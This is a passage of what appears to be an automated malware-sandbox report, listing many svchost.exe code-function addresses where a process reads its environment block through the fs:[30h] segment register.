Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]	1_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]	1_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]	1_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h]	1_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h]	1_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0350625D mov eax, dword ptr fs:[00000030h]	1_2_0350625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h]	1_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436259 mov eax, dword ptr fs:[00000030h]	1_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]	1_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]	1_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]	1_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]	1_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]	1_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342826B mov eax, dword ptr fs:[00000030h]	1_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342823B mov eax, dword ptr fs:[00000030h]	1_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h]	1_2_035062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]	1_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]	1_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]	1_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]	1_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]	1_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]	1_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]	1_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]	1_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]	1_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]	1_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]	1_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]	1_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]	1_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]	1_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]	1_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]	1_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]	1_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]	1_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]	1_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]	1_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]	1_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]	1_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]	1_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]	1_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]	1_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]	1_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]	1_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]	1_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]	1_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]	1_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]	1_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]	1_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]	1_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]	1_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]	1_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]	1_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]	1_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]	1_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]	1_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]	1_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]	1_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]	1_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]	1_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]	1_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]	1_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]	1_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]	1_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]	1_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]	1_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]	1_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]	1_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]	1_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]	1_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]	1_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]	1_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]	1_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]	1_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]	1_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]	1_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]	1_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]	1_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]	1_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]	1_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]	1_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]	1_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]	1_2_034280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]	1_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]	1_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]	1_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]	1_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]	1_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]	1_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]	1_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]	1_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]	1_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]	1_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]	1_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]	1_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]	1_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]	1_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]	1_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]	1_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]	1_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]	1_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]	1_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]	1_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]	1_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]	1_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]	1_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]	1_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]	1_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]	1_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]	1_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]	1_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]	1_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]	1_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]	1_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]	1_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]	1_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]	1_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]	1_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]	1_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]	1_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]	1_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]	1_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]	1_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]	1_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]	1_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]	1_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]	1_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]	1_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]	1_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]	1_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]	1_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]	1_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]	1_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]	1_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]	1_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]	1_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]	1_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]	1_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]	1_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]	1_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]	1_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]	1_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]	1_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]	1_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]	1_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]	1_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]	1_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]	1_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]	1_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]	1_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]	1_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]	1_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]	1_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]	1_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]	1_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]	1_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]	1_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]	1_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]	1_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]	1_2_0345E53E
